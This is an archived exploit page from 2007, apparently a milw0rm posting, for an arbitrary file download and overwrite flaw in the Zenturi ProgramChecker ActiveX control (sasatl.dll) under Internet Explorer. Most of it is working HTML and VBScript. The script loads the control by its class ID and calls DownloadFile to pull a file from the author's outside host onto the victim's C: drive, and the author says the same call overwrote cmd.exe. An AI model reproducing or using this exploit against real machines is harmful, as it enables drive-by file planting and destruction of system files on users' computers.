32 lines
No EOL
1.3 KiB
HTML
32 lines
No EOL
1.3 KiB
HTML
<pre>
|
|
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/30</b></p></span>
|
|
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------
|
|
<b>Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit</b>
|
|
url: http://www.programchecker.com/activeintro.aspx
|
|
|
|
author: shinnai
|
|
mail: shinnai[at]autistici[dot]org
|
|
site: http://shinnai.altervista.org
|
|
|
|
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
|
all software that use this ocx are vulnerable to this exploits.
|
|
|
|
Using the "DownloadFile" method, you can download everything you want on a pc. This
|
|
exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.
|
|
-------------------------------------------------------------------------------------------
|
|
|
|
<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test' ></object>
|
|
|
|
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
|
|
|
<script language='vbscript'>
|
|
Sub tryMe()
|
|
|
|
test.DownloadFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\shinnai.txt" ,"0", "0"
|
|
|
|
End Sub
|
|
</script>
|
|
</span></span>
|
|
</code></pre>
|
|
|
|
# milw0rm.com [2007-05-30] |